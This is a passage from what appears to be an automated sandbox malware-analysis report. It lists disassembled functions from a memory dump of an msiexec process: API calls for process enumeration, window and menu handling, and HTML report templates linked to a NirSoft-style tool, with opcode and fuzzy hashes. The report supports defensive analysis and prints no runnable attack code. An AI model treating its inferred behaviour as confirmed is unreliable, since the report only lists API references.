                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2012295524-70141382
                                                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1700100422-0
                                                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 552707033-0
                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: %%0.%df
                                                                                                    • API String ID: 3473751417-763548558
                                                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                    • String ID: A
                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 973020956-4135340389
                                                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy
                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                    • API String ID: 1284135714-318151290
                                                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                    Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                    • String ID: 4$h
                                                                                                    • API String ID: 4019544885-1856150674
                                                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 290601579-0
                                                                                                    • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                    • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                    • memset.MSVCRT ref: 0044505E
